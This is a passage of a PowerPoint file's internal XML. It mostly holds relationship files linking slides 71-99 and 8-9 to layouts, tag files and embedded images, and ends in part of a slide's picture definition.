<file path=ppt/slides/_rels/slide71.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout541.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag272.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag271.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag270.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag269.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide72.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout551.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag277.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag276.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag275.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag274.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag273.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide73.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout561.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag281.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag280.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag279.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag278.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide74.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout571.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag285.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag284.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag283.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag282.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide75.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout581.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag289.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag288.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag287.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag286.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide76.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout591.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag293.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag292.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag291.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag290.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide77.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout601.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag297.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag296.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag295.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag294.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide78.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout611.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag301.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag300.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag299.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag298.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide79.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout621.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag305.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag304.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag303.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag302.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag25.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag24.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide80.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout631.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag309.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag308.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag307.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag306.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide81.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout641.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag313.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag312.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag311.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag310.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide82.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout651.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag317.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag316.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag315.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag314.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide83.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout661.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag321.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag320.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag319.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag318.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide84.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout671.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag325.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag324.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag323.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag322.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide85.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout681.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag329.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag328.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag327.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag326.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide86.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout691.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag333.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag332.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag331.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag330.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide87.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout701.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag337.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag336.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag335.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag334.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide88.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout711.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag342.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag341.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag340.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag339.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag338.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide89.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout721.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag346.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag345.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag344.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag343.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag30.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag28.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag27.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag26.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide90.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout731.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag350.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag349.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag348.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag347.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide91.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout741.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag354.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag353.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag352.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag351.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide92.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout751.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag358.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag357.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag356.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag355.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide93.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout761.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag362.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag361.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag360.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag359.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide94.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout771.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag366.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag365.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag364.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag363.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide95.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout781.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag370.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag369.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag368.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag367.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide96.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout791.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag374.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag373.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag372.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag371.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide97.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout801.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag378.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag377.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag376.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag375.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide98.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout811.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag382.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag381.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag380.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag379.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide99.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout821.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag386.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag385.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag384.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag383.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图片 7" descr="V-136038-F72FEC97O"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="10000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="159385" y="-137795"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
